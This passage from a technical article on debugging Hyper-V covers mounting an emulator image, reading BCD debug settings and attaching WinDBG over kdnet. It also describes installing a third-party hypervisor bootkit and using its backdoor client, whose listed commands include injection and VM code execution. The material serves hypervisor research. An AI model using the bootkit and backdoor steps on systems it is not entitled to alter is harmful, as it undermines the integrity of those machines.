Name of catalog can contains another build number in future.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before mount:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 94px; overflow: hidden; width: 549px;"><img height="94" src="https://lh6.googleusercontent.com/ZU7cxH-ZLdWczo-YYwHu06B0ZJ1BwNEtAH9GkZBj1azURXL7OG888pg0oS5RdRlEsdrqWvgw2boHTLIue5r0I5lnpnIwn6S4zHI9w3Pa0bJO5MNPFje9Gb1zFcATS5PnizlhThkjX7f-u4Sykg" style="margin-left: 0px; margin-top: 0px;" width="549" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After 
mount:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 168px; overflow: hidden; width: 477px;"><img height="168" src="https://lh4.googleusercontent.com/1GxjXaDhH60TWBBc1009JQFl8uqwO6Yg8q056upyLt6mt7Curz2azVQTCMQyuGF2BKsaxIrPc1Pn3ksYDARgw86LBAHG42R64dsUWcYvLQGpgTRUE6WVD9jCPvsPjztytX8Agm6YIuk_m7r6pw" style="margin-left: 0px; margin-top: 0px;" width="477" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">select volume with VIRT_EFIESP label:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Get-Volume | ? 
{$_.FileSystemLabel -eq "VIRT_EFIESP"} | Format-List</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mountvol Z: \\?\Volume{12aef83a-6cf2-4ea1-932f-b3a586a65308}\</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /store "Z:\efi\Microsoft\boot\BCD" /dbgsettings</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">you can get all settings of boot records of root emulator partition, using command:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /enum all /v /store "Z:\efi\Microsoft\boot\BCD"</span></p><p 
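dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The mount, volume lookup and bcdedit steps above, collected into one script that also parses the /dbgsettings output; this is an added example, not code from the article. The image path C:\HyperVDebug\flash.vhdx, the drive letter Z: and the helper name ConvertFrom-BcdSettings are assumptions made for the example.</span></p>

```powershell
# Added example (not from the original article): the mount / find-volume /
# bcdedit steps from this section as one script. Run from an elevated
# PowerShell on the host. Assumed values, constructed for this example:
$VhdxPath   = 'C:\HyperVDebug\flash.vhdx'   # copy of the emulator's flash.vhdx
$MountPoint = 'Z:'                          # a free drive letter
$BcdStore   = "$MountPoint\efi\Microsoft\boot\BCD"

# Parse the two-column output of "bcdedit /dbgsettings" into a hashtable,
# e.g. @{ debugtype = 'NET'; port = '50005'; key = '...' }. Setting lines use
# a padded column layout, so requiring two or more spaces between name and
# value skips bcdedit's status sentences. (Hypothetical helper name.)
function ConvertFrom-BcdSettings {
    param([string[]]$Lines)
    $result = @{}
    foreach ($line in $Lines) {
        if ($line -match '^(\w+)\s{2,}(.+?)\s*$') {
            $result[$Matches[1]] = $Matches[2]
        }
    }
    return $result
}

# 1. Attach the VHDX read-only. Mount-DiskImage comes from the Storage module,
#    so the host does not need the Hyper-V PowerShell module for this step.
Mount-DiskImage -ImagePath $VhdxPath -Access ReadOnly | Out-Null
try {
    # 2. Find the emulator's EFI system partition by its label. It gets no
    #    drive letter on its own, which is why the article uses mountvol.
    $diskNumber = (Get-DiskImage -ImagePath $VhdxPath).Number
    $efiVolume  = Get-Partition -DiskNumber $diskNumber | Get-Volume |
                  Where-Object { $_.FileSystemLabel -eq 'VIRT_EFIESP' }
    if (-not $efiVolume) { throw "No VIRT_EFIESP volume found in $VhdxPath" }

    # 3. Assign the drive letter via the volume's \\?\Volume{GUID}\ path.
    mountvol $MountPoint $efiVolume.Path
    try {
        # 4. Debugger settings of the store: a kdnet target shows debugtype NET
        #    together with hostip, port and the key used on the "-k net:" line.
        $dbg = ConvertFrom-BcdSettings (& bcdedit /store $BcdStore /dbgsettings)
        $dbg.GetEnumerator() | Sort-Object Name | ForEach-Object {
            '{0,-12} {1}' -f $_.Name, $_.Value
        }

        # 5. The testsigning / debug flags live in the boot entries themselves,
        #    so enumerate all entries and pick those lines out.
        & bcdedit /store $BcdStore /enum all /v |
            Where-Object { $_ -match '^(testsigning|debug|bootdebug)\s' }
    }
    finally {
        mountvol $MountPoint /D              # drop the drive letter again
    }
}
finally {
    Dismount-DiskImage -ImagePath $VhdxPath | Out-Null
}
```

<p 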
dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can also see that the testsigning option is on.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To get the guest OS debugging settings you need a guest OS kernel dump:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 70px; overflow: hidden; width: 473px;"><img height="70" src="https://lh6.googleusercontent.com/HZ3NlcnAo5GKk7lq13nvYjamgf_DxZ4Pr5VDJdtXsM8O6ZZZLTpOKYIvk6lTEHKzpab54NR9QTvQ1YDfV4K0B-QWsWreWsomPHM8XIEHXwin_WfLg2Yhy3fzfowemH8DYutAKlCPbO8EJxc9HQ" style="margin-left: 0px; margin-top: 0px;" width="473" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to Windows Device Portal – Debug. Download a live kernel dump and open it in WinDBG.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 249px;"><img height="159" src="https://lh3.googleusercontent.com/mMyLxLcDuglmVetogRsswL9Rzn6FXTaNvXGvSYfHYNySa5Uz2PCpkxnICrX2V6crsLEIZwxAgO7YzA3Qdf6oUOPHNWjx2cNAvk-lUzzNGBzgjyS3PC1xh2ooqfnzlUj_IfsY6o1IpI-aZy-I5w" style="margin-left: 0px; margin-top: 0px;" width="249" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And run the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">decypher_kdnet_key.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script. The script finds the kdnet parameters at a known offset in the dump and encodes them into the base36 key format.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally, we get the current kdnet debugging settings:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 71px; overflow: hidden; width: 442px;"><img height="71" src="https://lh6.googleusercontent.com/s7fCVhJkOvcp4H-TtlWDTRHk0ICILCJzWErQzYrC0nZ7pYiiMFg_UO9iwms9iFCT_9tgy3IPVss3h8xSLE0rex9nHxH2_pg78OsApPDkyAt0VcTsmOg285qYJgtc8fV8UjuWJvmHCtv0IatquQ" style="margin-left: 0px; margin-top: 0px;" width="442" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, launch WinDBG using the command line:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">windbgx.exe -k net:port=50005,key=2k85xmoorkrbx.u7xg1f35gwi4.24033ib08wzhs.2o8xly2z2ik5y</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and you are attached to the host OS:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 
font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 193px; overflow: hidden; width: 430px;"><img height="193" src="https://lh6.googleusercontent.com/ukHAl9myTFSHoURJ5Qre3YyZIBv6uO3xZnHsEOVopDQL2_u8XUZEgxaybL601q5Gppt2Qs5R5m63weHh_IM66VkBLSUWSJgdTwVJUo0UCKitow2fj7oAqsseiRmFhar5hpMudXvG_g2Q-0Fo_Q" style="margin-left: 0px; margin-top: 0px;" width="430" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> Debugging Hyper-V on a physical host</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is research from @d_olex and @_xeroxz: they replace some boot files and intercept the Hyper-V loading process. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Download the latest build from </span><a href="https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and simply run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootkit_installer.ps1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in the host OS (tested on Windows Server 2019 inside VMware Workstation).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 326px; overflow: hidden; width: 328px;"><img height="326" src="https://lh4.googleusercontent.com/JMKpdT3jPUSKZCSsQNemlb2j2zqHL5CkBa11R7xqKpYiCBxvyTrSLpx_fZ5bx2oQ5zI6rw3PZ0P7_IYY3hzBpb9uxtFHGLPo2TuFjOlu_S_WWGeJaxIieRiWw1LKXFMwgOXvs1Xfqsmm21M1hw" style="margin-left: 0px; margin-top: 0px;" width="328" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Reboot the host OS and see:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 223px; overflow: hidden; width: 
296px;"><img height="223" src="https://lh5.googleusercontent.com/TG21nOWxPd6ppRMEzoP5C6Gwreb5d806-Vq0chuv6BXArj4P6oVzDaY2RrbRIB5NCJ_7PB_Uynwo3Up-3xDApaNyJznhHzEF6vW85lX5Eq38GtBXa6CkTFwwsIaMkuQj6WycAJ0laqRJx6RvFg" style="margin-left: 0px; margin-top: 0px;" width="296" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the guest OS we can run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">backdoor_client.exe</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and see a lot of Hyper-V internals information:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 400px; overflow: hidden; width: 300px;"><img height="400" src="https://lh6.googleusercontent.com/4UzDOj_lxyxFOa0JyfSnZNfg-8yZx_eXo7UT0L1jD60pPfnyV9lyF_Uz0jW_c9FaJrZQ6CReYFC201QCELLU5LUB24TYvL-NXXvZajbdv1cNEJHPGoo3OGv9VDcO0lUaQNd-F7RpGY0f3n9eFw" style="margin-left: 0px; margin-top: 0px;" width="300" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Currently supported commands:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--debug</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--virt-read</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--virt-translate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; 
margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--phys-read</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--phys-translate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--idt</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--vmcs</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--ept-list</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--ept-dump</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 
0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-info</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-ps</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-debug-enable</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-inject</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--vm-inject</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--vm-exec</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 
35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can download Voyager from </span><a href="https://githacks.org/_xeroxz/voyager" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://githacks.org/_xeroxz/voyager</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It doesn’t contain binaries (at the time of writing), so you need to compile it for your platform first and then run launch.bat. After rebooting you see:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 